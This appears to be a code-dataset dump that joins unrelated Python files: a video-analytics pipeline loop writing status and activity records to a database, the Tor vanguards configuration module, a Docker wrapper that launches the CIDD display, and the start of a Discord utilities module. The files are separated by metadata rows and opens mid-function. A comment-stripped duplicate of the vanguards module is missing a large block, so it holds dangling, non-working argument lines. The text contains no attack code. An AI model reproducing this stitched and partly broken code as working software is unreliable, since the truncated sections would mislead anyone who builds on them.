activity_name = activity_index["_source"]["uniqueName"]
print("activity_nameactivity_name",activity_name)
_dbb = DBCommon(host=dbhost, index="aividbots", office=office)
aividbot_index = _dbb.get(botId)
aividbot_name = aividbot_index["_source"]["name"]
print("aividbot_nameaividbot_name",aividbot_name)
_dbk = DBCommon(host=dbhost, index="kpis", office=office)
kpi_index = _dbk.get(kpisId)
kpi_name = kpi_index["_source"]["name"]
print("kpi_namekpi_name",kpi_name)
_dbs = DBCommon(host=dbhost, index="sites", office=office)
site_index = _dbs.get(site_id)
site_name = site_index["_source"]["name"]
print("site_namesite_name",site_name)
_dbn = DBCommon(host=dbhost, index="nodes", office=office)
node_index = _dbn.get(nodeId)
node_name = node_index["_source"]["name"]
print("node_namenode_name",node_name)
_dbs = DBCommon(host=dbhost, index="provisions", office=office)
provision_index = _dbs.get(sensor)
sensor_name = provision_index["_source"]["name"]
print("sensor_namesensor_name",sensor_name)
self._db_activity.ingest({
"name": aividbot_name,
"office": {
"lat": office[0],
"lon": office[1],
},
"status": "connected",
"skip": every_nth_frame,
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
"activity_name":activity_name,
"sensor_name":sensor_name,
"aividbot_name":aividbot_name,
"kpi_name":kpi_name,
"site_name":site_name,
"node_name":node_name,
"timestamp":int(time.time()) * 1000
})["_id"]
except Exception as error:
print("wrong in activity ingest",error)
except:
print("Failed to update algorithm status", flush=True)
self._stop.set()
raise
self._stop.wait(3)
self._stop=None
pipeline.stop()
except:
print(traceback.format_exc(), flush=True)
VAServing.stop()
except:
print(traceback.format_exc(), flush=True)
| 43.6 | 103 | 0.426046 |
from db_common import DBCommon
from db_query import DBQuery
from paho.mqtt.client import Client
from db_ingest import DBIngest
from threading import Event
from vaserving.vaserving import VAServing
from vaserving.pipeline import Pipeline
from configuration import env
import time
import traceback
import psutil
mqtthost = env["MQTTHOST"]
dbhost = env["DBHOST"]
dbmhost = env["DBMHOST"]
every_nth_frame = int(env["EVERY_NTH_FRAME"])
office = list(map(float, env["OFFICE"].split(",")))
class RunVA(object):
def _test_mqtt_connection(self):
print("testing mqtt connection", flush=True)
mqtt = Client()
while True:
try:
mqtt.connect(mqtthost)
break
except:
print("Waiting for mqtt...", flush=True)
time.sleep(5)
print("mqtt connected", flush=True)
mqtt.disconnect()
def __init__(self, pipeline, version="2", stop=Event()):
super(RunVA, self).__init__()
self._test_mqtt_connection()
self._pipeline = pipeline
self._version = version
self._db = DBIngest(host=dbhost, index="algorithms", office=office)
self._db_activity = DBIngest(host = dbmhost, index="activity", office=office)
self._stop=stop
def stop(self):
print("stopping", flush=True)
self._stop.set()
def loop(self, sensor, location, uri, algorithm, algorithmName, options={}, topic="analytics"):
try:
VAServing.start({
'model_dir': '/home/models',
'pipeline_dir': '/home/pipelines',
'max_running_pipelines': 1,
})
try:
source={
"type": "uri",
"uri": uri,
}
destination={
"type": "mqtt",
"host": mqtthost,
"clientid": algorithm,
"topic": topic
}
tags={
"sensor": sensor,
"location": location,
"algorithm": algorithmName,
"office": {
"lat": office[0],
"lon": office[1]
},
}
parameters = {
"inference-interval": every_nth_frame,
"recording_prefix": "/tmp/rec/" + sensor
}
parameters.update(options)
pipeline = VAServing.pipeline(self._pipeline, self._version)
print("pipelinepipeline", self._pipeline)
instance_id = pipeline.start(source=source,
destination=destination,
tags=tags,
parameters=parameters)
if instance_id is None:
raise Exception("Pipeline {} version {} Failed to Start".format(
self._pipeline, self._version))
self._stop.clear()
while not self._stop.is_set():
status = pipeline.status()
print(status, flush=True)
if status.state.stopped():
print("Pipeline {} Version {} Instance {} Ended with {}".format(
self._pipeline, self._version, instance_id, status.state.name),
flush=True)
break
if status.avg_fps > 0 and status.state is Pipeline.State.RUNNING:
avg_pipeline_latency = status.avg_pipeline_latency
if not avg_pipeline_latency: avg_pipeline_latency = 0
try:
self._db.update(algorithm, {
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
})
try:
dbb = DBQuery(host = dbhost, index = "botconfigs", office=office)
for botconfig in dbb.search("sensorId:'"+str(sensor)+"'"):
activityId = botconfig["_source"]["activityId"]
botId = botconfig["_source"]["botId"]
kpisId = botconfig["_source"]["kpisId"]
site_id = botconfig["_source"]["siteId"]
nodeId = botconfig["_source"]["nodeId"]
_dba = DBCommon(host = dbhost, index = "activities", office=office)
activity_index = _dba.get(activityId)
activity_name = activity_index["_source"]["uniqueName"]
print("activity_nameactivity_name",activity_name)
_dbb = DBCommon(host=dbhost, index="aividbots", office=office)
aividbot_index = _dbb.get(botId)
aividbot_name = aividbot_index["_source"]["name"]
print("aividbot_nameaividbot_name",aividbot_name)
_dbk = DBCommon(host=dbhost, index="kpis", office=office)
kpi_index = _dbk.get(kpisId)
kpi_name = kpi_index["_source"]["name"]
print("kpi_namekpi_name",kpi_name)
_dbs = DBCommon(host=dbhost, index="sites", office=office)
site_index = _dbs.get(site_id)
site_name = site_index["_source"]["name"]
print("site_namesite_name",site_name)
_dbn = DBCommon(host=dbhost, index="nodes", office=office)
node_index = _dbn.get(nodeId)
node_name = node_index["_source"]["name"]
print("node_namenode_name",node_name)
_dbs = DBCommon(host=dbhost, index="provisions", office=office)
provision_index = _dbs.get(sensor)
sensor_name = provision_index["_source"]["name"]
print("sensor_namesensor_name",sensor_name)
self._db_activity.ingest({
"name": aividbot_name,
"office": {
"lat": office[0],
"lon": office[1],
},
"status": "connected",
"skip": every_nth_frame,
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
"activity_name":activity_name,
"sensor_name":sensor_name,
"aividbot_name":aividbot_name,
"kpi_name":kpi_name,
"site_name":site_name,
"node_name":node_name,
"timestamp":int(time.time()) * 1000
})["_id"]
except Exception as error:
print("wrong in activity ingest",error)
except:
print("Failed to update algorithm status", flush=True)
self._stop.set()
raise
self._stop.wait(3)
self._stop=None
pipeline.stop()
except:
print(traceback.format_exc(), flush=True)
VAServing.stop()
except:
print(traceback.format_exc(), flush=True)
| true | true |
1c33391aac998ba80be1193d3b8412ce2e951685 | 8,400 | py | Python | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 132 | 2018-01-17T22:35:22.000Z | 2022-03-19T08:35:41.000Z | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 87 | 2018-05-25T23:20:24.000Z | 2022-02-02T08:41:08.000Z | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 22 | 2018-05-29T10:47:48.000Z | 2022-03-15T03:45:04.000Z | """ This file contains configuration defaults, options parsing, and config
file code.
"""
import argparse
import ipaddress
import os
import socket
import sys
from . import bandguards
from . import rendguard
from . import vanguards
from . import control
from . import logger
from .logger import plog
try:
from configparser import SafeConfigParser, Error
except ImportError:
from ConfigParser import SafeConfigParser, Error
################# Global options ##################
ENABLE_VANGUARDS=True
ENABLE_RENDGUARD=True
ENABLE_BANDGUARDS=True
ENABLE_LOGGUARD=True
ENABLE_CBTVERIFY=False
ENABLE_PATHVERIFY=False
# State file location
STATE_FILE = "vanguards.state"
# Config file location
_CONFIG_FILE = "vanguards.conf"
# Loglevel
LOGLEVEL = "NOTICE"
# Log to file instead of stdout
LOGFILE = ""
# If true, write/update vanguards to torrc and then exit
ONE_SHOT_VANGUARDS = False
CLOSE_CIRCUITS = True
CONTROL_IP = "127.0.0.1"
CONTROL_PORT = ""
CONTROL_SOCKET = ""
CONTROL_PASS = ""
_RETRY_LIMIT = None
def setup_options():
global CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS, STATE_FILE
global ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY
global ENABLE_PATHVERIFY
global LOGLEVEL, LOGFILE
global ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS
parser = argparse.ArgumentParser()
parser.add_argument("--state", dest="state_file",
default=os.environ.get("VANGUARDS_STATE", STATE_FILE),
help="File to store vanguard state")
parser.add_argument("--generate_config", dest="write_file", type=str,
help="Write config to a file after applying command args")
parser.add_argument("--loglevel", dest="loglevel", type=str,
help="Log verbosity (DEBUG, INFO, NOTICE, WARN, or ERROR)")
parser.add_argument("--logfile", dest="logfile", type=str,
help="Log to LOGFILE instead of stdout")
parser.add_argument("--config", dest="config_file",
default=os.environ.get("VANGUARDS_CONFIG", _CONFIG_FILE),
help="Location of config file with more advanced settings")
parser.add_argument("--control_ip", dest="control_ip", default=CONTROL_IP,
help="The IP address of the Tor Control Port to connect to (default: "+
CONTROL_IP+")")
parser.add_argument("--control_port", type=str, dest="control_port",
default=CONTROL_PORT,
help="The Tor Control Port to connect to (default: "+
"tries both 9050 and 9151)")
parser.add_argument("--control_socket", dest="control_socket",
default=CONTROL_SOCKET,
help="The Tor Control Socket path to connect to "+
"(default: try /run/tor/control, then control port)")
parser.add_argument("--control_pass", dest="control_pass",
default=CONTROL_PASS,
help="The Tor Control Port password (optional) ")
parser.add_argument("--retry_limit", dest="retry_limit",
default=_RETRY_LIMIT, type=int,
help="Reconnect attempt limit on failure (default: Infinite)")
parser.add_argument("--one_shot_vanguards", dest="one_shot_vanguards",
action="store_true",
help="Set and write layer2 and layer3 guards to Torrc and exit.")
parser.add_argument("--disable_vanguards", dest="vanguards_enabled",
action="store_false",
help="Disable setting any layer2 and layer3 guards.")
parser.set_defaults(vanguards_enabled=ENABLE_VANGUARDS)
parser.add_argument("--disable_bandguards", dest="bandguards_enabled",
action="store_false",
help="Disable circuit side channel checks (may help performance)")
parser.set_defaults(bandguards_eabled=ENABLE_BANDGUARDS)
parser.add_argument("--disable_logguard", dest="logguard_enabled",
action="store_false",
help="Disable Tor log monitoring (may help performance)")
parser.set_defaults(logguard_enabled=ENABLE_LOGGUARD)
parser.add_argument("--disable_rendguard", dest="rendguard_enabled",
action="store_false",
help="Disable rendezvous misuse checks (may help performance)")
parser.set_defaults(rendguard_enabled=ENABLE_RENDGUARD)
parser.add_argument("--enable_cbtverify", dest="cbtverify_enabled",
action="store_true",
help="Enable Circuit Build Time monitoring")
parser.set_defaults(cbtverify_enabled=ENABLE_CBTVERIFY)
parser.add_argument("--enable_pathverify", dest="pathverify_enabled",
action="store_true",
help="Enable path selection monitoring")
parser.set_defaults(pathverify_enabled=ENABLE_PATHVERIFY)
options = parser.parse_args()
(STATE_FILE, CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS,
ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY,
ENABLE_PATHVERIFY, ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS) = \
(options.state_file, options.control_ip, options.control_port,
options.control_socket, options.control_pass,
options.bandguards_enabled, options.rendguard_enabled,
options.logguard_enabled,
options.cbtverify_enabled, options.pathverify_enabled,
options.one_shot_vanguards, options.vanguards_enabled)
if options.loglevel != None:
LOGLEVEL = options.loglevel
logger.set_loglevel(LOGLEVEL)
if options.logfile != None:
LOGFILE = options.logfile
if LOGFILE != "":
logger.set_logfile(LOGFILE)
if options.write_file != None:
config = generate_config()
config.write(open(options.write_file, "w"))
plog("NOTICE", "Wrote config to "+options.write_file)
sys.exit(0)
# If control_ip is a domain name, try to resolve it.
if options.control_ip != None:
try:
_ = ipaddress.ip_address(options.control_ip)
except ValueError:
try:
# We're fine with AF_INET, stem supports only IPv4 addresses anyway.
addr = socket.getaddrinfo(options.control_ip, None, socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
CONTROL_IP = addr[0][4][0]
except socket.gaierror:
plog("ERROR", "Failed to resolve hostname "+options.control_ip)
sys.exit(1)
plog("DEBUG", "Applied command line options")
return options
# Avoid a big messy dict of defaults. We already have them.
def get_option(config, section, option, default):
try:
if type(default) == bool:
ret = config.get(section, option) == "True"
else:
ret = type(default)(config.get(section, option))
except Error as e:
return default
return ret
def get_options_for_module(config, module, section):
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
setattr(module, param,
get_option(config, section, param.lower(), val))
def set_options_from_module(config, module, section):
config.add_section(section)
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
config.set(section, param, str(val))
def generate_config():
config = SafeConfigParser(allow_no_value=True)
set_options_from_module(config, sys.modules[__name__], "Global")
set_options_from_module(config, vanguards, "Vanguards")
set_options_from_module(config, bandguards, "Bandguards")
set_options_from_module(config, rendguard, "Rendguard")
set_options_from_module(config, rendguard, "Logguard")
return config
def apply_config(config_file):
config = SafeConfigParser(allow_no_value=True)
config.readfp(open(config_file, "r"))
get_options_for_module(config, sys.modules[__name__], "Global")
get_options_for_module(config, vanguards, "Vanguards")
get_options_for_module(config, bandguards, "Bandguards")
get_options_for_module(config, rendguard, "Rendguard")
get_options_for_module(config, rendguard, "Logguard")
# Special cased CLOSE_CIRCUITS option has to be transfered
# to the control.py module
setattr(control, "_CLOSE_CIRCUITS", CLOSE_CIRCUITS)
plog("NOTICE", "Vanguards successfilly applied config options from "+
config_file)
| 35.146444 | 115 | 0.686905 | import argparse
import ipaddress
import os
import socket
import sys
from . import bandguards
from . import rendguard
from . import vanguards
from . import control
from . import logger
from .logger import plog
try:
from configparser import SafeConfigParser, Error
except ImportError:
from ConfigParser import SafeConfigParser, Error
help="File to store vanguard state")
parser.add_argument("--generate_config", dest="write_file", type=str,
help="Write config to a file after applying command args")
parser.add_argument("--loglevel", dest="loglevel", type=str,
help="Log verbosity (DEBUG, INFO, NOTICE, WARN, or ERROR)")
parser.add_argument("--logfile", dest="logfile", type=str,
help="Log to LOGFILE instead of stdout")
parser.add_argument("--config", dest="config_file",
default=os.environ.get("VANGUARDS_CONFIG", _CONFIG_FILE),
help="Location of config file with more advanced settings")
parser.add_argument("--control_ip", dest="control_ip", default=CONTROL_IP,
help="The IP address of the Tor Control Port to connect to (default: "+
CONTROL_IP+")")
parser.add_argument("--control_port", type=str, dest="control_port",
default=CONTROL_PORT,
help="The Tor Control Port to connect to (default: "+
"tries both 9050 and 9151)")
parser.add_argument("--control_socket", dest="control_socket",
default=CONTROL_SOCKET,
help="The Tor Control Socket path to connect to "+
"(default: try /run/tor/control, then control port)")
parser.add_argument("--control_pass", dest="control_pass",
default=CONTROL_PASS,
help="The Tor Control Port password (optional) ")
parser.add_argument("--retry_limit", dest="retry_limit",
default=_RETRY_LIMIT, type=int,
help="Reconnect attempt limit on failure (default: Infinite)")
parser.add_argument("--one_shot_vanguards", dest="one_shot_vanguards",
action="store_true",
help="Set and write layer2 and layer3 guards to Torrc and exit.")
parser.add_argument("--disable_vanguards", dest="vanguards_enabled",
action="store_false",
help="Disable setting any layer2 and layer3 guards.")
parser.set_defaults(vanguards_enabled=ENABLE_VANGUARDS)
parser.add_argument("--disable_bandguards", dest="bandguards_enabled",
action="store_false",
help="Disable circuit side channel checks (may help performance)")
parser.set_defaults(bandguards_eabled=ENABLE_BANDGUARDS)
parser.add_argument("--disable_logguard", dest="logguard_enabled",
action="store_false",
help="Disable Tor log monitoring (may help performance)")
parser.set_defaults(logguard_enabled=ENABLE_LOGGUARD)
parser.add_argument("--disable_rendguard", dest="rendguard_enabled",
action="store_false",
help="Disable rendezvous misuse checks (may help performance)")
parser.set_defaults(rendguard_enabled=ENABLE_RENDGUARD)
parser.add_argument("--enable_cbtverify", dest="cbtverify_enabled",
action="store_true",
help="Enable Circuit Build Time monitoring")
parser.set_defaults(cbtverify_enabled=ENABLE_CBTVERIFY)
parser.add_argument("--enable_pathverify", dest="pathverify_enabled",
action="store_true",
help="Enable path selection monitoring")
parser.set_defaults(pathverify_enabled=ENABLE_PATHVERIFY)
options = parser.parse_args()
(STATE_FILE, CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS,
ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY,
ENABLE_PATHVERIFY, ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS) = \
(options.state_file, options.control_ip, options.control_port,
options.control_socket, options.control_pass,
options.bandguards_enabled, options.rendguard_enabled,
options.logguard_enabled,
options.cbtverify_enabled, options.pathverify_enabled,
options.one_shot_vanguards, options.vanguards_enabled)
if options.loglevel != None:
LOGLEVEL = options.loglevel
logger.set_loglevel(LOGLEVEL)
if options.logfile != None:
LOGFILE = options.logfile
if LOGFILE != "":
logger.set_logfile(LOGFILE)
if options.write_file != None:
config = generate_config()
config.write(open(options.write_file, "w"))
plog("NOTICE", "Wrote config to "+options.write_file)
sys.exit(0)
if options.control_ip != None:
try:
_ = ipaddress.ip_address(options.control_ip)
except ValueError:
try:
addr = socket.getaddrinfo(options.control_ip, None, socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
CONTROL_IP = addr[0][4][0]
except socket.gaierror:
plog("ERROR", "Failed to resolve hostname "+options.control_ip)
sys.exit(1)
plog("DEBUG", "Applied command line options")
return options
# Avoid a big messy dict of defaults. We already have them.
def get_option(config, section, option, default):
try:
if type(default) == bool:
ret = config.get(section, option) == "True"
else:
ret = type(default)(config.get(section, option))
except Error as e:
return default
return ret
def get_options_for_module(config, module, section):
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
setattr(module, param,
get_option(config, section, param.lower(), val))
def set_options_from_module(config, module, section):
config.add_section(section)
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
config.set(section, param, str(val))
def generate_config():
config = SafeConfigParser(allow_no_value=True)
set_options_from_module(config, sys.modules[__name__], "Global")
set_options_from_module(config, vanguards, "Vanguards")
set_options_from_module(config, bandguards, "Bandguards")
set_options_from_module(config, rendguard, "Rendguard")
set_options_from_module(config, rendguard, "Logguard")
return config
def apply_config(config_file):
config = SafeConfigParser(allow_no_value=True)
config.readfp(open(config_file, "r"))
get_options_for_module(config, sys.modules[__name__], "Global")
get_options_for_module(config, vanguards, "Vanguards")
get_options_for_module(config, bandguards, "Bandguards")
get_options_for_module(config, rendguard, "Rendguard")
get_options_for_module(config, rendguard, "Logguard")
# Special cased CLOSE_CIRCUITS option has to be transfered
# to the control.py module
setattr(control, "_CLOSE_CIRCUITS", CLOSE_CIRCUITS)
plog("NOTICE", "Vanguards successfilly applied config options from "+
config_file)
| true | true |
1c333aa93800b8a44a18eb736edabe8885f9321e | 6,000 | py | Python | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | null | null | null | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | null | null | null | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | 2 | 2021-07-02T06:20:59.000Z | 2022-01-28T06:23:58.000Z | #!/usr/bin/env python
#===========================================================================
#
# Run CIDD in docker. Wrapper script.
#
# This script performs the following steps:
#
# 1. clone lrose-core from git
# 2. clone lrose-netcdf from git
# 3. setup autoconf Makefile.am files
# 4. run configure to create makefiles
# 5. perform the build in 32-bit mode, and install
# 6. check the build
#
# You can optionally specify a release date.
#
# Use --help to see the command line options.
#
#===========================================================================
from __future__ import print_function
import os
import sys
from sys import platform
import shutil
import subprocess
from optparse import OptionParser
import time
from datetime import datetime
from datetime import date
from datetime import timedelta
def main():
global options
# parse the command line
thisScriptName = os.path.basename(__file__)
usage = "usage: " + thisScriptName + " [options]"
homeDir = os.environ['HOME']
parser = OptionParser(usage)
parser.add_option('--debug',
dest='debug', default=True,
action="store_true",
help='Set debugging on')
parser.add_option('--verbose',
dest='verbose', default=False,
action="store_true",
help='Set verbose debugging on')
parser.add_option('--docker_image',
dest='docker_image',
default='nsflrose/lrose-cidd',
help='Set the docker image to run. Should be in DockerHub.')
parser.add_option('--params',
dest='params',
default='',
help="Set params file name. For example: 'CIDD.pecan'. In this case the URL would be 'http://front.eol.ucar.edu/displayParams/CIDD.pecan'. i.e. the param file name will be appended to the URL. If the --params option is not used, then the params_url will be used instead.")
parser.add_option('--params_url',
dest='params_url',
default='http://front.eol.ucar.edu/displayParams/CIDD.pecan',
help='Set the full URL for CIDD params file. This activates if the --params option is not used.')
parser.add_option('--params_local',
dest='params_local',
default='',
help="Set path of local params file. This will be provided to CIDD running in the container.")
(options, args) = parser.parse_args()
# check OS - is this a mac?
global isOsx
isOsx = False
if (platform.find("darwin") == 0):
isOsx = True
# set DISPLAY string
if (isOsx):
# APPLE OSX
ipAddr = "localhost"
ifconfig = subprocess.check_output(['ifconfig']).decode('ascii')
for line in ifconfig.split("\n"):
if ((line.find("127.0.0.1") < 0) and
line.find("inet ") >= 0):
ipaddr = line.split()[1]
print("ipAddr: ", ipAddr, file=sys.stderr)
displayNum = ":0"
ps = subprocess.check_output(['ps', '-e']).decode('ascii')
for line in ps.split("\n"):
if ((line.find("xinit") < 0) and
(line.find("Xquartz") >= 0) and
(line.find("listen") >= 0)):
displayNum = line.split()[4]
displayStr = "-e DISPLAY=" + ipaddr + displayNum
else:
# LINUX
displayStr = "-e DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix"
# debug
if (options.debug):
print("Running %s:" % thisScriptName, file=sys.stderr)
print(" docker image: ", options.docker_image, file=sys.stderr)
print(" CIDD params URL: ", options.params_url, file=sys.stderr)
if (isOsx):
print(" OS: this is a mac", file=sys.stderr)
else:
print(" OS: this is NOT a mac", file=sys.stderr)
print(" displayStr: ", displayStr, file=sys.stderr)
# for local params make copy into /tmp
paramsLocal = False
localName = os.path.basename(options.params_local)
tmpDir = "/tmp/cidd_params"
if (len(options.params_local) > 0):
paramsLocal = True
try:
os.makedirs(tmpDir)
except:
if (options.verbose):
print("Info exists: ", tmpDir, file=sys.stderr)
shellCmd("rsync -av " + options.params_local + " " + tmpDir)
# set up call for running docker
cmd = "docker run -v $HOME/.Xauthority:/root/.Xauthority "
cmd += "-v /tmp/cidd_images:/root/images "
if (paramsLocal):
cmd += "-v /tmp/cidd_params:/root/params "
cmd += displayStr + " "
cmd += options.docker_image + " "
cmd += "/usr/local/cidd/bin/CIDD -font fixed -p "
if (paramsLocal):
cmd += "/root/params/" + localName
elif (len(options.params) > 0):
cmd += "http://front.eol.ucar.edu/displayParams/" + options.params
else:
cmd += options.params_url
if (options.verbose):
cmd += " -v 2"
# run the command
shellCmd(cmd)
# exit
sys.exit(0)
########################################################################
# Run a command in a shell, wait for it to complete
def shellCmd(cmd):
print("Running cmd:", cmd, file=sys.stderr)
try:
retcode = subprocess.check_call(cmd, shell=True)
if retcode != 0:
print("Child exited with code: ", retcode, file=sys.stderr)
sys.exit(1)
else:
if (options.verbose):
print("Child returned code: ", retcode, file=sys.stderr)
except OSError as e:
print("Execution failed:", e, file=sys.stderr)
sys.exit(1)
print(" done", file=sys.stderr)
########################################################################
# Run - entry point
if __name__ == "__main__":
main()
| 31.413613 | 294 | 0.543667 |
from __future__ import print_function
import os
import sys
from sys import platform
import shutil
import subprocess
from optparse import OptionParser
import time
from datetime import datetime
from datetime import date
from datetime import timedelta
def main():
global options
thisScriptName = os.path.basename(__file__)
usage = "usage: " + thisScriptName + " [options]"
homeDir = os.environ['HOME']
parser = OptionParser(usage)
parser.add_option('--debug',
dest='debug', default=True,
action="store_true",
help='Set debugging on')
parser.add_option('--verbose',
dest='verbose', default=False,
action="store_true",
help='Set verbose debugging on')
parser.add_option('--docker_image',
dest='docker_image',
default='nsflrose/lrose-cidd',
help='Set the docker image to run. Should be in DockerHub.')
parser.add_option('--params',
dest='params',
default='',
help="Set params file name. For example: 'CIDD.pecan'. In this case the URL would be 'http://front.eol.ucar.edu/displayParams/CIDD.pecan'. i.e. the param file name will be appended to the URL. If the --params option is not used, then the params_url will be used instead.")
parser.add_option('--params_url',
dest='params_url',
default='http://front.eol.ucar.edu/displayParams/CIDD.pecan',
help='Set the full URL for CIDD params file. This activates if the --params option is not used.')
parser.add_option('--params_local',
dest='params_local',
default='',
help="Set path of local params file. This will be provided to CIDD running in the container.")
(options, args) = parser.parse_args()
global isOsx
isOsx = False
if (platform.find("darwin") == 0):
isOsx = True
if (isOsx):
ipAddr = "localhost"
ifconfig = subprocess.check_output(['ifconfig']).decode('ascii')
for line in ifconfig.split("\n"):
if ((line.find("127.0.0.1") < 0) and
line.find("inet ") >= 0):
ipaddr = line.split()[1]
print("ipAddr: ", ipAddr, file=sys.stderr)
displayNum = ":0"
ps = subprocess.check_output(['ps', '-e']).decode('ascii')
for line in ps.split("\n"):
if ((line.find("xinit") < 0) and
(line.find("Xquartz") >= 0) and
(line.find("listen") >= 0)):
displayNum = line.split()[4]
displayStr = "-e DISPLAY=" + ipaddr + displayNum
else:
displayStr = "-e DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix"
if (options.debug):
print("Running %s:" % thisScriptName, file=sys.stderr)
print(" docker image: ", options.docker_image, file=sys.stderr)
print(" CIDD params URL: ", options.params_url, file=sys.stderr)
if (isOsx):
print(" OS: this is a mac", file=sys.stderr)
else:
print(" OS: this is NOT a mac", file=sys.stderr)
print(" displayStr: ", displayStr, file=sys.stderr)
paramsLocal = False
localName = os.path.basename(options.params_local)
tmpDir = "/tmp/cidd_params"
if (len(options.params_local) > 0):
paramsLocal = True
try:
os.makedirs(tmpDir)
except:
if (options.verbose):
print("Info exists: ", tmpDir, file=sys.stderr)
shellCmd("rsync -av " + options.params_local + " " + tmpDir)
cmd = "docker run -v $HOME/.Xauthority:/root/.Xauthority "
cmd += "-v /tmp/cidd_images:/root/images "
if (paramsLocal):
cmd += "-v /tmp/cidd_params:/root/params "
cmd += displayStr + " "
cmd += options.docker_image + " "
cmd += "/usr/local/cidd/bin/CIDD -font fixed -p "
if (paramsLocal):
cmd += "/root/params/" + localName
elif (len(options.params) > 0):
cmd += "http://front.eol.ucar.edu/displayParams/" + options.params
else:
cmd += options.params_url
if (options.verbose):
cmd += " -v 2"
shellCmd(cmd)
sys.exit(0)
| true | true |
1c333b08d4042cb9cf835653ded7ce018942773f | 154 | py | Python | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | def main(a, b):
result = 0
for i in range(a, b+1):
if i % 2 != 0:
result += i
return result
print(main(4862, 9002))
| 15.4 | 27 | 0.461039 | def main(a, b):
result = 0
for i in range(a, b+1):
if i % 2 != 0:
result += i
return result
print(main(4862, 9002))
| true | true |
1c333c5a0e8d89b3154871874c0ce9f7c532675b | 13,510 | py | Python | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import dataclasses
import inspect
import logging
from dataclasses import dataclass
from typing import (
List,
Any,
Iterable,
Optional,
TYPE_CHECKING,
Union,
Tuple,
Callable,
Dict,
Coroutine,
)
import aiomysql
try:
import aiopg
except ImportError:
aiopg = None
logging.warning(
"Aiopg is not installed correctly, postgres databases are not supported."
)
import aiosqlite
import discord
from motor import motor_asyncio
if TYPE_CHECKING:
from discord.ext import commands
from .database import Database
from datetime import timedelta
__all__ = (
"COLUMN_TYPES",
"DatabaseNotConnected",
"InvalidGenerator",
"get_generator_response",
"maybe_coroutine",
"generate_column_types",
"questionnaire",
"EventManager",
"create_task",
"CogManager",
"DatabaseChecker",
"CacheBased",
)
COLUMN_TYPES = {
motor_asyncio.AsyncIOMotorDatabase: None, # mongo does not require any columns
aiosqlite.core.Connection: {
"snowflake": "INTEGER",
"string": "TEXT",
"number": "INTEGER",
"smallnumber": "INTEGER",
},
aiomysql.pool.Pool: {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
},
}
if aiopg:
COLUMN_TYPES[aiopg.pool.Pool] = {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
}
class DatabaseNotConnected(Exception):
"""Raises an error when the user tries to use a method of a manager without a database connected to it."""
@dataclass
class CacheBased:
"""
Represents a cache manager that manages member cache.
"""
bot: commands.Bot
wipe_cache_delay: timedelta
_cache: dict = dataclasses.field(default_factory=dict, init=False, repr=False)
def __post_init__(self):
asyncio.get_event_loop().create_task(self.__wipe_cache())
async def __wipe_cache(self) -> None:
"""
|coro|
This function is responsible for wiping the member cache.
:return: None
:rtype: None
"""
while not self.bot.is_closed():
await asyncio.sleep(self.wipe_cache_delay.total_seconds())
self._cache = {}
class InvalidGenerator(Exception):
"""
Raises an exception when the user passes an invalid generator.
"""
__slots__ = ("generator",)
def __init__(self, generator):
self.generator = generator
super().__init__(
f"Generator of type {type(self.generator)!r} is not supported."
)
